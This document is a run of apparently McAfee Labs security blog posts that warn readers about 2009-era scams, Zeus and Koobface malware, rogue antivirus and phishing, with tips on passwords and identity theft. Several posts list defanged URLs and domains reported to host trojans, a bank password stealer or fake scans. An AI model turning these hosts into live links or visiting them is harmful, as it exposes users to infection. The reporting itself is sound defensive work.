The first is a fake lottery. In this case, the source claims the recipient has won a large sum of money from the South African Football Association. After contacting the lottery manager, the victim of the scam will be asked to pay “processing fees” or “transfer charges” so that the winnings can be distributed. Don’t expect to ever see a payment.

The second example is a “watch live games online” offer. Can you guess it’s a fake? The victims pay to download an HD video player, but they receive only a rogue security product (a.k.a. scareware).

When a sport makes the headlines, there are always fans who want to take part. We’ve also encountered fake club offers that are dedicated solely to collecting subscriptions.

As June 2010 approaches we’re certain these scam offers will increase in number and in professionalism. You must be especially vigilant if you plan to buy tickets online for the South Africa games. Go to fifa.com, use a reputable travel agent, or contact your football/soccer association directly. Don’t assume unsolicited online offers are genuine.

In September, The Times of London wrote that New Scotland Yard had tracked down and closed more than 100 sites so far, with as many as 20 based in Britain. These fraudsters were only the pioneers of an Internet crimewave that will rise as the World Cup approaches.

Here is a screenshot I took today on the official FIFA website. (Prices for the various categories are in US dollars.) The site explains that only one location–fifa.com–will sell tickets and that only a few other companies will sell authorized packages.

Compare the real thing with this suspicious site I also found today. It offers different prices for the same categories:

Don’t be disappointed before your team starts to play. Shop carefully if you plan to buy tickets!

Mapping the Mal Web: McAfee’s 3rd Annual Report

We have just released “Mapping the Mal Web,” our third report revealing the riskiest and safest web domains to surf and search.

For the first time combining data from McAfee’s SiteAdvisor and TrustedSource, the report is even more comprehensive than last year’s, naming Cameroon (.cm) as the riskiest place to surf with a whopping 36.7 percent of the domains posing a security risk.

For those domains for which we had 2,000 or more download tests, we measured the percentage of those tests that were risky. Romania (.ro, 21.0 percent), China (.cn, 18.6 percent), and the generic .info (15.2 percent) were found to be the most risky, leading the fourth-place finisher, .biz (6.8 percent), by a wide margin.

This report also shows how much registrars can achieve when they try. Last year Hong Kong (.hk) was the riskiest domain to surf. After taking appropriate actions, their efforts paid off: with just 1.1 percent this year, they have dropped to 34th place. Congratulations to everyone involved!! ;)

That’s enough numbers for now. Get the full report here or find a summary over here.

The report is available in several other languages from the McAfee home page, and to help you avoid risky sites I strongly recommend our free SiteAdvisor.

H1N1 Vaccination Profile – A path to infection

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

H1N1 Vaccination Profile email claims to be from the CDC.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a URL that points to a website which urges the victim to download a vaccination profile archive:

This website wants to give you a virus.

The link is an executable that installs a VERY recent Zeus trojan variant. Zeus is an easy-to-use tool for constructing trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detects this strain (7/41 engines detected it according to VirusTotal, and McAfee had 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicates that most of them were registered with a Belgian registrar, active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar, “Xin Net Technologies”, but the DNS servers themselves are hosted at locations in the US, Japan, and Hong Kong. We even see some of the DNS servers in use as having previously been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate that some of the DNS servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses for the websites hosting the Trojan; the addresses stem from all over the world and appear to be DSL accounts.

The primary countries hosting the websites at the time of this writing are in Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

Get Rich Quick! Just In Time for the Holidays

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that cyber criminals can take advantage of. Fears of not being able to pay the monthly mortgage, car payments, and backed-up bills, and of providing for your children for the holidays, have put many people into situations they never thought they would find themselves in. This has caused many to become desperate and vulnerable as they try to make ends meet. Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up their sensitive information. In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple such scams arriving via email which are linking off to Twitter updates or free blogging services like Google’s Blogspot:

Get Rich!

More Getting Rich!!!

Get Rich Tweet!!

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card! One bit of advice that we ask users to follow is that if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing its address into your browser. Do not click on a link in an email or instant message to get you there, because the link might actually be masked to go to a lookalike site set up by cyber criminals to steal your personal information. If the offer that arrived in your inbox is legitimate, it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

Boosting Security Awareness in Colleges

Security breaches, laptop theft, and identity theft happen all the time, and these crimes increase every year. The need for people to become more aware of their digital presence and the threats surrounding it is vital.

The pace at which these threats increase is much faster than our awareness grows, making a bad situation. One way to improve matters is to implement security-awareness programs in colleges and universities.

Why choose colleges? Higher education institutions are an ideal platform for spreading security awareness because they produce so much of our future workforce. With computers everywhere in businesses, it’s essential that these graduates learn about the invisible threats that face them and their employers’ information.

Another benefit of focusing on colleges and universities is that this environment provides both a very good learning atmosphere and people working in many fields. Thus a security-awareness program will benefit not only students in the computer or business fields, but also in medical, environmental, media, and many more disciplines.

Hot Topic: Identity Theft
College students are attractive targets for identity thieves because they generally have clean credit records, allowing thieves to easily take out loans in their names. Many students may also not realize the potential for fraud and do not guard their personal information as closely as they should. Students’ social security numbers, email IDs, and addresses may be listed on everything from identification cards to report cards, which makes this information readily available to enterprising thieves. Universities and colleges have also come under attack from hackers in recent years, due to the value of the information they store.

What are some aspects of identity theft? Here are some figures from a 2009 study by Javelin Strategy & Research Center:

  • Identity theft is on the rise, affecting almost 10 million victims in 2008. That’s a 22 percent increase from 2007.
  • Victims are spending less money to correct the damage from identity theft. The mean cost per victim is $500, and most victims pay nothing due to zero-liability fraud-protection programs offered by their financial institutions.
  • 71 percent of fraud happens within one week of the theft of a victim’s personal data.
  • Low-tech methods for stealing personal information are still the most popular for identity thieves. Stolen wallets and physical documents accounted for 43 percent of all identity theft, while online methods accounted for only 11 percent.

Types of Identity Theft
Identity theft can happen to anyone, and it can come in all shapes and sizes. For example, your credit card number could be stolen and used to make online purchases, a thief could impersonate you to open up a loan in your name, a felon could commit a crime and pretend to be you when caught, or someone could use your personal information to apply for a job.

Here’s a chart describing kinds of identity theft, based on Federal Trade Commission complaint data:

[Chart: kinds of identity theft, from Federal Trade Commission complaint data]

Students should protect themselves by detecting and resolving identity thefts. Here are some general tips to minimize the risk of identity theft:

  • Check credit card statements regularly. Students should examine their financial statements at least once per month for any unusual activity. A credit-monitoring service can be a valuable tool in fighting identity theft, as it would alert them if any new accounts are opened in their names.
  • Use strong passwords. If remembering many passwords is too difficult, create a few strong ones that include numbers, capital letters, and special characters such as ^ or *. Most important, do not share your passwords, debit or credit card PINs, or leave lying about any papers or unlocked computers with personal information.
  • Protect your computer. It is a good practice to enable all security features and keep your anti-virus and spyware protection up to date. Use a password-enabled lock (such as a screen saver) on your computer in case you leave it running while you are not present.
  • Don’t swallow the bait. College students, though technically savvy, can fall victim to scams. Beware of phishing attempts that ask you to update personal data such as social security numbers and bank account information. The senders are trying to steal your data to commit fraud. Students should also watch out for fake anti-virus tools that claim your computer is infected and insist you run a “scan” to find malware. Use McAfee SiteAdvisor to check if you are surfing safely.


Koobface Worm Asks for Captcha

We discussed in a recent blog how Google Reader has become an unwitting spam target. We now see the same behavior in a recent variant of Koobface. This variant uses the Google Reader page to host the malware. Once the user selects the Google link, a fake YouTube window appears, as shown below.

[Screenshot: fake YouTube window]

When the user tries to play the YouTube video, the webpage gets redirected to:

hxxp://www.hs-limmattal.ch/{blocked}/

which pretends to be a Facebook help center page that, in an ironic twist, displays information on how to protect against the Koobface worm!

[Screenshot: fake Facebook help center page]

The user is then asked to download a setup file that purports to be a free anti-virus scanner. The file size is said to be 32.39MB, whereas the one actually downloaded is only 40.5KB in size. The download doesn’t stop here. The malware keeps on downloading many components that support it. It also checks for the latest copy of itself and downloads as needed.

This variant of Koobface also tracks the cookies on the user’s machine and tries to send them to a remote server.

One more trick the malware uses is to get a Captcha solved and then use the answer to register another Facebook account. The infected machine shows a Captcha window and then tries to deceive the user by displaying a countdown to shutdown. Koobface, however, does not shut down the user’s machine when the countdown timer finishes. Instead the user’s machine is locked until the Captcha is entered successfully.

[Screenshot: Captcha window with shutdown countdown]

After the user enters the Captcha correctly, a JPEG image of the Captcha is sent to the remote server (as shown in the image below):

[Screenshot: JPEG image of the Captcha sent to the remote server]

The malware keeps asking for a response from the remote server; once it receives the response, a new account gets created. The account can be used for spamming or for any other activity as desired by the attacker. The same tactic is used for infecting Twitter, MySpace, and hi5 (all popular websites):

[Screenshot: the same tactic used against Twitter, MySpace, and hi5]

This new method of account creation is cheap, and there are dedicated Captcha administrators who will do this work for just a few cents.

This worm steals email credentials, FTP credentials, and IM application credentials. The encrypted stolen data is sent to the Trojan’s command and control server. The worm has also redirected user searches.

To get rid of the locked machine, users can follow this process:

  • Press Ctrl+Alt+Del
  • Go to Task Manager
  • Then select Processes
  • In Processes, search for RUNDLL32.exe
  • End that process
  • Search for processes with names rdr_xxxxxxxx. End these processes as well.

These steps will kill the malware processes running on the user’s machine and will unlock the machine.

McAfee Labs reminds users not to click on YouTube links from unknown sources and to not accept any requests from unknown users!

Make Your Password Secure

No matter how sophisticated security gets, we still need to handle the basics properly. One of the most basic tasks is to create and use secure passwords. You need them to log onto your computer, reach internal applications, and enter just about every website you visit. They are pervasive in our connected world.

But how many of us give any real thought to how secure our passwords are? Because we use them so often, we’re tempted to reuse the same one over and over again. However, as your mother might say, that’s a poor decision. Here are pros and cons of several common password techniques, and a simple-to-remember method that is both easy for you and hard for hackers.

Frequency and complexity
Our decisions about passwords are often some balance of frequency and complexity. The more frequently we use a password, the easier it is to remember it; and the more complex the password is, the less likely we will be able to remember it. This difficulty leads many people to use the same password for all their online accounts. Banking, auction, and social networking sites could have the same password for the same account name. In such a situation a hacker who compromises a single website can get the username and password for all of your accounts. It is important for people to remember that their website passwords are owned by that website, not by the individuals who entered them. Thus giving a website a password that accesses other accounts is not the best way to maintain security.

Users should avoid any password that can be cracked by a dictionary attack. If your password can be found in an unabridged dictionary, then it can be “guessed” by a computer program that simply tries every entry. “123456” is not adequate to avoid a dictionary attack because it is the most commonly used password in existence. Using profanity may make talking about the password unacceptable in polite conversation, but that social boundary will not stop someone willing to break the law to steal your identity.

Password habits
Most people’s password habits fall into one of three categories:

  • The global password. Many people use the same password everywhere. This is the worst password method; it means that someone who hacks a website that you bought something from years ago can now get into all your most frequently used accounts.
  • The short list of passwords. Others create a hierarchical list of passwords that they reuse. This allows them to use their most complex password for financial websites, a simpler password for websites where items are purchased, and another password for social networking websites. This is exponentially better than the single global password, but exponentially better than “worst” is still not good.
  • The black book of passwords. Some people choose a unique password for every website they visit, but because of the huge list of passwords they need to remember, they all are written on a pad of paper kept near the computer. This is not only unwieldy and not flexible (if you go on vacation and forget it), but you can lose the list or have it stolen by someone who gains brief access to your office or computer. Many corporate environments that force people to constantly change their passwords are littered with passwords on sticky notes or on paper in a drawer that is accessible by coworkers, cleaners, or burglars.

Creating your password algorithm
In creating passwords we want to maximize complexity and eliminate repeated passwords without adding any additional stress to our brains. To do this we need an internal algorithm that will generate a unique, difficult-to-guess password for every website we visit. The algorithm needs to be repeatable, so that remembering the passwords is not important: all we need to remember is the algorithm that generates the password. Thus we need to take something about ourselves, add something unique about the website in question, and modify that information so that the algorithm is not obvious to anyone looking at the password.

Here is an example of a password for mcafee.com.

My token: light
The website: mcafee.com
The password: 123l1ghTjdqr33^!

In spite of the password’s complexity, the algorithm here is relatively simple. We start with “123,” and then add the word “light” with the “i” replaced with the number 1 and a capital “T” at the end. We add “jdqr33,” the letters (and numbers) above the word “mcafee” on my keyboard. We finish off with a bang—“^!”—to make sure we include some special characters.

Here’s another password with the same token and website:

The password: LlIiFCM999gh+

That’s the “li” in “light,” but with an upper and lowercase of each, then capitalized consonants from “mcafee” written backward, a few 9’s, and a “ght” with the “t” replaced by a plus sign.

Your algorithm can be anything you want, but you should choose one that includes numbers, letters (both capital and lowercase), as well as special characters. Some password validation algorithms don’t accept special characters, and others require you to start with a letter. These can be your second and third tries if you don’t get it on the first. Having a good password algorithm prevents someone from getting one password and using it on all your accounts, it also makes your password hard to guess, and it doesn’t require you to carry around a list of passwords.

In the case where your office administrator forces you to change your password frequently, you need only to write down the website token instead of the full password. So even if people find your little black book of passwords, they’ll be lost without the algorithm.
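The first password algorithm above (prefix “123”, the token with “i” replaced by 1 and its last letter capitalized, the keys above the site name’s letters, then “^!”), together with the dictionary check from the earlier paragraph, as an added example; this is not code from the original post. It assumes a US QWERTY layout for the “keys above” step and uses a small constructed list of common passwords in place of a real dictionary.

```python
"""Site-specific password derivation as described in the post (added example).

Assumptions: US QWERTY layout; COMMON_PASSWORDS is a tiny constructed stand-in
for the word list a dictionary attack would use.
"""

# US QWERTY rows, top to bottom, index-aligned as the post's "jdqr33" mapping uses them.
QWERTY_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]

# Constructed sample; a real cracking dictionary has millions of entries.
COMMON_PASSWORDS = {"123456", "password", "qwerty", "letmein", "light", "mcafee"}


def key_above(ch):
    """Return the key in the row above ch on a US QWERTY keyboard.
    Number-row keys and characters not on the keyboard are returned unchanged."""
    for row_index in range(1, len(QWERTY_ROWS)):
        pos = QWERTY_ROWS[row_index].find(ch)
        if pos != -1:
            return QWERTY_ROWS[row_index - 1][pos]
    return ch


def site_label(website):
    """Reduce a site name or URL to the part the algorithm uses:
    'mcafee.com' and 'https://www.mcafee.com/login' both give 'mcafee'."""
    host = website.lower().split("://")[-1].split("/")[0]
    parts = [p for p in host.split(".") if p and p != "www"]
    return parts[0] if parts else host


def site_password(token, website):
    """Build the password exactly as in the post's first example:
    '123' + token with 'i' -> '1' and last letter capitalized
    + keys above the site label's letters + '^!'."""
    if not token:
        raise ValueError("token must not be empty")
    mangled = token.replace("i", "1")
    mangled = mangled[:-1] + mangled[-1].upper()
    shifted = "".join(key_above(c) for c in site_label(website))
    return "123" + mangled + shifted + "^!"


def in_dictionary(password, wordlist=COMMON_PASSWORDS):
    """Dictionary-attack check: True if the password is in the word list (case-insensitive)."""
    return password.lower() in wordlist


def meets_class_rules(password):
    """The post's composition rule: digits, lower and upper case letters, and a special character."""
    return (any(c.isdigit() for c in password)
            and any(c.islower() for c in password)
            and any(c.isupper() for c in password)
            and any(not c.isalnum() for c in password))


if __name__ == "__main__":
    # Same token, two sites: the passwords differ, so one leaked site does not expose the other.
    for site in ("mcafee.com", "https://www.ebay.com/signin"):
        pw = site_password("light", site)
        print(f"{site:30} {pw:20} dictionary={in_dictionary(pw)} classes_ok={meets_class_rules(pw)}")
```

Running it reproduces the post’s “123l1ghTjdqr33^!” for mcafee.com and a different string for the second site, and both pass the character-class check while the bare token “light” fails both checks.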

Zero-Day IE Exploit Coming to a Browser Near You

Information regarding another zero-day vulnerability in the Internet Explorer web browser, affecting versions 6 and 7, was published as a proof of concept over the weekend. The vulnerability lies in a missing check when accessing a website’s stylesheet markup information through the “getElementsByTagName” script method. The current PoC exploit uses heap spraying to write the malicious shellcode to memory before triggering the vulnerability. While exploits for this new vulnerability may not yet be in the wild (beyond PoC state), you can be sure that the malware community will be working overtime to ensure reliability and maximum effect. The underground community rapidly turns these proofs of concept into working exploits to add to their web exploit toolkits, differentiating their product from the competition, especially when there is no patch available from Microsoft to mitigate the risk.

Web Exploits continue to be the preferred attack mechanism of choice, with many organisations challenged by managing the number of patches for the browser and associated plug-ins, making it an effective attack vector for the malware authors. We have seen increasingly complex JavaScript mechanisms to attempt to evade detection – please ensure you have appropriate protection against this contemporary attack vector.

Recommendations to disable scripting in your browser may help protect against this new threat, but that simply is not realistic in the Web 2.0 world in which we now browse. McAfee protects its customers against the current PoC exploit, blocking it proactively as “JS/Exploit-BO.gen” in VirusScan and as “BehavesLike.JS.Suspicious.A” at the Web Gateway with McAfee Gateway-Anti-Malware.

Fly for $1 or Your Money Back!

It is the time of year to get together with family and friends, and that often involves flying. So, how about a promotional airline ticket for just $1?

That sounds like an irresistible idea! Though it also sounds too good to be true. As you can imagine, there is something wrong here. Instead of flying for a buck, you may end up with several hundred dollars less in your bank account.

This example is the most recent seasonal spam targeting Brazilians. In the image below you can see the pitch.

[Image: the $1 airline ticket spam]

When you click on the image, which is hosted at hxxp://dhroot.hpg.com.br/images/danosse.jpg, you’ll follow a link that will attempt to download a Trojan from hxxp://www.medcitybuilders.com/plugins/system/[REMOVED]/. This Trojan is a downloader that will copy a password-stealing malware that targets the customers of Brazilian banks. The malware is currently hosted at hxxp://www.radfahrschule.at/html/modules/PagEd/browsepics/[REMOVED].

In Brazil we say “there is no such thing as free dinner.” In the States there’s no free lunch. In this case we can also see that there are no free air tickets. :)

COFEE Break Turns Messy

A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. As some active system processes and network data are volatile and may be lost after the computer is turned off, investigators were in search of a tool that could assist them in the very limited window of time they may have to investigate a crime. It is for this reason that, in October, Microsoft and the National White Collar Crime Center (NW3C) announced an agreement establishing NW3C as the first U.S.-based distributor of the Computer Online Forensic Evidence Extractor (COFEE).

Recently the software seems to have leaked onto the Internet. On Tuesday, November 10, someone using the pseudonym DrWeird of Eti.in posted the documentation and a working build of Version 1.1.2 online.

Here are some details I collected from one of the posted manuals.

Working on Windows XP, COFEE consists of three major components: the GUI for the investigator, the command‐line application to be executed on the target machine, and the individual tools that are managed by COFEE and the command‐line application. As explained in the manual, the execution process is divided into three phases: tool generation, data acquisition, and report generation.

During the tool generation phase, digital forensics specialists can select tools to run against a target machine based on the individual case requirements. They can do this by either selecting a predefined profile, or by manually creating a profile and selecting which tools (including switches) to run against the target machine.

Two predefined profiles were developed to help investigators during the generation phase. The first is the Volatile Data Profile, which carries out a full forensic examination. None of the programs makes any direct writes to the suspect’s file system. The second, the Incident Response Profile, can be used when an investigator cannot perform a forensic analysis on the target machine. This profile is designed to have minimal impact on the suspect’s file system.

After “brewing” a cup of COFEE, investigators insert the USB device into the target machine. The data acquisition phase runs and all collected data will be stored on the USB stick.

After data collection, investigators can start the report generation phase by loading that information into the GUI console on the investigator’s machine and generate a report.

In the past I pointed out that if law enforcement created dedicated tools, then one of these days they would certainly fall into crooked hands. Those hands would be happy to study and reuse them for their own purposes. The detection policy for the original code, as well as for its existing and potential future variants, is still much debated. Today the disclosed program is not so sensitive; it is merely a repackaging of known utility tools many have been using for a long time. But this leak must remind us that people will use the same tools for very different reasons and goals.

The McColo Effect: One Year Later

One year ago today email administrators were astonished to notice that the amount of spam hitting their mail servers had plunged precipitously. Email volumes dropped off as much as 60 percent to 70 percent, and the reason wasn’t immediately obvious to anyone except for the folks who knew that McColo, a major spam-hosting ISP, had been taken offline. Three of the largest spam-sending botnets at the time–Rustock, Srizbi, and Mega-D–had command and control machines hosted at McColo and were drastically affected. Mega-D’s volume dropped by more than 95 percent and Srizbi volumes dropped by more than 80 percent.

[Graph: Srizbi volume drop-off]

[Graph: Mega-D volume drop-off]

However, only days after McColo was taken offline, it was reconnected for a brief period–about 12 hours–by its uplink provider, giving just enough time for the Rustock botnet owners to recommunicate with their infected machines and point the command and control centers to other service providers. Rustock quickly regained its status as a top spam distributor. The Mega-D botnet owners also bounced back until it was shut down just this past week. Srizbi, which once accounted for more than 50 percent of spam volume, never recovered and is no longer a factor in today’s spam wars.

What has happened since McColo was shut down? Did spam volumes ever recover from the loss of three of the largest spam-sending botnets? Not only did spam volumes recover, unfortunately, but they recovered quickly and have greatly surpassed the volumes that we saw before McColo was taken offline.

[Graph: spam volume before and after the McColo takedown]

You can see in the preceding graph where volumes stood and how they dropped off after McColo was cut off. However, the shutdown’s effect was brief and ultimately small. We have seen dramatic increases since then due to the relaunching of botnets such as Rustock as well as new botnets such as Bredo (which primarily sends fake nondelivery notifications spoofing package delivery services like FedEx, DHL, and UPS) and Waledac (the rebirth of the Storm botnet). Spam volumes have more than doubled since just February 2009, dwarfing several times over the decreases due to McColo’s demise.

The McColo closure as a single event remains significant, but when you compare it with the huge increases in volumes that we have seen since then–because of increased spoofs against social media sites through viruses like Koobface, and spam continuing to be a major factor in the successes of Rustock and Cutwail–the decrease now reflects only a momentary blip on the radar.

Nonetheless, you should expect to see more of these types of takedowns as security researchers and research organizations continue to get involved, but you should also expect the overall effect of those shutdowns to be temporary. McColo has taught botnet owners a lesson. As a result botnet control centers have become more distributed, spanning many networks in many countries. Today taking down a big hosting provider would prove only a minor inconvenience as opposed to a major victory for security forces.

Rogue Security Product Copies McAfee’s Look and Feel

How good are you at identifying a genuine security product from an imposter that claims to offer protection? If you think you are good at it, then have a look at the images below.

[Legitimate McAfee site]

[Rogue Anti-Virus MaCatte site]

Recently we have seen the rapid growth of rogue anti-virus/spyware programs. This one is especially interesting. Why? Because it mimics McAfee’s security product. This rogue software displays the same user interface as McAfee Security Center. It also offers a web page that looks similar to McAfee’s legitimate site.

I suppose we should be flattered that malware authors have chosen our product as one worth imitating. Rogue anti-virus products have long mimicked Microsoft’s security apps in Windows XP (FakeAlert-XPSecCenter) and Windows Vista/Windows 7 (FakeAlert-EA).

The idea behind fake AV software is to trick unsuspecting users into thinking their machines are infected. The malware will display a window that shows many innocent files detected arbitrarily as compromised. These fake security alerts are baseless–they exist to trick victims into pressing the panic button. In this case agreeing to “Remove all threats now” will lead to purchasing the MaCatte Antivirus 2009 product. The rogue software offers several “features”:

  • It displays fake warning messages and “Safety Center Alert” pop-ups
  • It flashes icons that appear in the system tray
  • It hijacks the browser’s homepage to a site that mimics McAfee’s site (as shown in the second image)

    [MaCatte SecurityCenter image]

    And that’s not all–MaCatte Antivirus 2009 will block currently installed or downloaded anti-virus software. It will redirect your browser to various misleading websites, including the rogue program’s homepage, www.macatte.com.

    Once installed, MaCatte Antivirus will start automatically when you boot Windows. Then it will scan your computer and display numerous infections, but will not remove them until you first purchase the program.

    The cost of cleaning the “malicious” files comes at the rip-off price of $99. Leading legitimate anti-virus security products don’t come close to the cost of this imposter. I hope that’s an eye opener for you. Don’t become a victim.

    Update: McAfee’s legal team contacted the domain registrars, who swiftly brought down the site to spare unsuspecting surfers from becoming victims to this imposter. Detection is available beginning with the 5793 DATs as FakeAlert-MaCatte.

    Pacquiao vs. Cotto

    Warning to all Pacquiao and Cotto fans. Bad guys are taking advantage of their upcoming fight. Searching for “Pacquiao vs Cotto” could lead to fake anti-virus programs.

    This is similar to the scam described in Arun Pradeep’s blog post. Once the search result is clicked, users are redirected to a website that shows a fake online malware scan and warns them that their systems are infected. It then asks them to install an anti-virus program to remove the malware.

    This fake online scanning is seen hosted at the following domains:

    • secure-pcprotection.net
    • examinedicho.com

    This malware is now detected as FakeAlert-AB. Always update your security product and be extra careful when accessing unknown sites.

    Rogue Anti-Spyware Targets Sesame Street’s Big Bird

    The idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Big Bird’s birthday.

    Big Bird

    It’s not new that the Google logo includes Big Bird; it does so on special occasions. The Google logo clearly shows Today’s Hot Trends, and that’s a target for malware writers.

    This year is the fortieth anniversary of Sesame Street, and the bad guys have begun their attack. Searching for keywords such as Big Bird’s birthday and Big Bird on Google displays pages with compromised sites.

    Watch the video below, which shows how rogue anti-spyware attacks a system.

    The video shows that the malware is literally pushed onto the system regardless of what the user does. In the past we have seen malware injected into a compromised site through exploits and iframes. Today, malware often attacks only from a search-results page. In certain attacks, if a user directly accesses a compromised site, then there’s no redirection to a payload and no infection.

    Users have no idea what they will get by clicking on search results, which now are like a virtual minefield; you never know what will happen next. McAfee strives to protect users from such attacks through its free SiteAdvisor technology. It warns users with green, yellow, and red alerts next to each search result. You can minimize your risk of attack by using SiteAdvisor and paying attention to what you are clicking on.

    Peer-to-Peer Goes Both Ways

    We all know the dangers of peer-to-peer (P2P) networks and their role in distributing malware. Most people who deal with this problem work tirelessly to limit the impact of these potential threat points by (among other things) adding anti-virus, firewalling, watching network flows for P2P traffic, and usually outright banning of P2P applications.

    They may, however, be looking the wrong way. The bits and bytes flow in two directions–in and out. Data leakage from a network is just as serious as bringing in malware-laden MP3s, cracked software, or .mov files.

    You may be thinking to yourself, “Yeah, but leaking information is for disgruntled employees, or those looking to profit from foreign spies being ‘in the market’ for specific secret data. I don’t employ people who would do that.”

    For argument’s sake, let’s say that you do in fact employ workers of the highest moral character, and that you’ve firewalled the outside, banned the applications, monitored the network traffic, and updated your anti-virus signatures.

    So what happens when one of your employees is out sick–yet a big presentation is still due on Friday? Any chance he or she may take work home to finish when “there just aren’t enough hours in the day”?

    The vector does not even need to be company-owned. If an employee is emailed the presentation, or copies it onto a USB device, this is the time that the data is the most vulnerable–it’s out of your control. Most home users do not implement the same security practices that a company does. If that data is moved into a directory reachable by the P2P application, it is reachable by potentially millions of users on the same P2P network. Do you think a file called OurSecretFormula.doc would look enticing?

    For those ever-present naysayers, here is a recent example of this occurring.

    So the moral of this story is not that this is new or ground breaking–it certainly isn’t. It’s just a reminder to look both ways.

    Tis the Season for Christmas Spam! Fa La La La La…

    It didn’t take long for spammers to change from Halloween lures to spam and malware. They’ve already moved to the Christmas season, and we have started to see emails from the Cutwail botnet that are using a Christmas theme to trick users into visiting malicious websites. Spammers must be trying to beat retailers to the advertising punch this year.

    Christmas spam

    The campaign we are currently monitoring uses subject lines that try to get users to visit websites selling fake jewelry and Rolexes. These spammers aren’t cheap either. Only the best will do for their customers–brands such as Cartier, Gucci, and Tag Heuer are on “sale” to all who would be fooled.

    Rolex ad

    They even went so far as to include a logo to the Better Business Bureau and a “Hacker Safe” image on their site. Ironic, isn’t it?

    This and similar sites are part of a campaign to steal your credit card information and identity. With the holiday shopping season rushing toward us, be sure to exercise extreme diligence regarding businesses you give your sensitive information to. The tricks that criminals use during the holiday season will be difficult to discern from legitimate marketing.

    How can you stay safe? Avoid clicking links in emails. If you want to visit your favorite retail site to check out their holiday specials, type the address directly into the address bar. Most legitimate sites will not force you to click a link within an email to take advantage of their latest deals.

    Facebook Phishing Campaign Pushes ‘Cocktail’ Attack

    We have already discussed the Facebook phishing campaign. Now the scammers are using the phishing campaign not just for spamming but also for a “cocktail” attack.

    • The scammers have targeted Facebook users, telling them that their Facebook account passwords have been changed.
    • The malware downloads a keylogger to collect credit card numbers, social security number, and other passwords from the victims’ machines.
    • The malware pushes a fake security product, which disables many applications, such as Notepad, Wordpad, etc., until the bad guys are paid.

    This phishing campaign attempts to convince users that the email comes from Facebook by forging the From: address.

    Phishing mail

    The mail claims the password has been changed and that it is available in the attached zip file. Once the victims unzip it, they see a file with a spreadsheet icon. When the victim tries to open the file to look for a password, it drops the payload and deletes itself. Once the malware is installed, it establishes a connection to the attacker’s server through the HTTP port and attempts to download more payloads onto the infected machine.

    The malware also downloads a keylogger and runs it covertly. This second attack captures every keystroke so that it can collect information such as login IDs and passwords, credit card and Social Security numbers, etc. The malware sends the data to a remote server through a backdoor it creates. But this is not yet the end of the game.

    While this data theft occurs, the malware also tries to download a fake security product. The rogue application that enters through the backdoor will be covertly installed on the victim’s machine. Once installed, the fake product runs a service that kills almost all open applications: Notepad, Calculator, Registry Editor, Task Manager, and others. (It does not kill Internet Explorer because it needs IE to communicate with the malware server.) After killing these apps, the malware shows a fake alert–claiming the application you’re trying to open is being used to connect to a malware server. (See image below.)

    Fake Alert

    Fake Security Product

    Phishing campaigns on social networking sites are not new. Scammers are not satisfied only pushing spam to sell “Canadian” pills. Now they also want to sell fake security products, and they need all of our passwords. With McAfee coverage, you’ll be protected against this cocktail attack.

    Missing Letter Links Fake AV With Extreme Porn

    Today, Microsoft’s Security Intelligence Report is out, and it’s no surprise that it’s littered with fake AV/security product threats–four out of the top five threats in the United States, no less. Let me show you that with a keen eye and our threat intelligence databases, the same group is responsible for a diverse set of criminal activity online, all at the same time.

    I’m a little pedantic about the Queen’s English from time to time, and like most people I also make mistakes. However, this little spelling error caught my eye and a quick Google proves it’s gone unnoticed by the owners for quite a while, too.

    I was doing a little research into some DSL IPs being abused at the moment and spotted the misspelling acess in this broken English phrase taken from the terms of service of a fake AV website:

    “If acess services is unavailable during the subscription period, the member has the right for a refund of subscription fee.”

    Google-dorking it with quotes so we get the exact phrase [link] reveals 141 sites that Google knows of. Misspelling access is hardly a crime, but copying the whole phrase is a little odd, isn’t it?

    Take a look at the terms and conditions page of advanced-virus-remover2009 .com. (Visiting this site is bad for your health.)
    Fake AV site

    And also the customer service page of this extreme porn site (incest-related domain redacted for obvious reasons):
    Incest Site

    These are sites that announce new content frequently, but the 18 U.S.C. 2257 record-keeping statements say that the content is ineligible–as it was created prior to July 3, 1995. And they don’t ask for your date of birth when you sign up, either. (The signs are always there!)

    …and one of the promotional affiliate networks for a network of porn sites:
    affiliate networks

    …and the world-renowned Data Backuper software from databackuper .com ;)
    Data Backuper

    These are old sites, so let’s be realistic here: It’s just a template. The bad guys are just lazy (or efficient, depending on your point of view) when it comes to their websites. As proof, if more were needed, advanced-virus-remover-2010 .com registered a day or two ago and is exactly the same.
    Fake AV site
    (Old techniques die hard, eh? ;) )

    The same group(s) are undoubtedly connected with the recent tsunami spam that’s spreading more fake-alert malware, given the overlap between the domains below and the hosts-file infection data in this detailed VIL entry: http://vil.nai.com/vil/content/v_162829.htm

    Lastly let’s take a look at their most recent flurry of fake-AV/codec/crypto&porn domains.
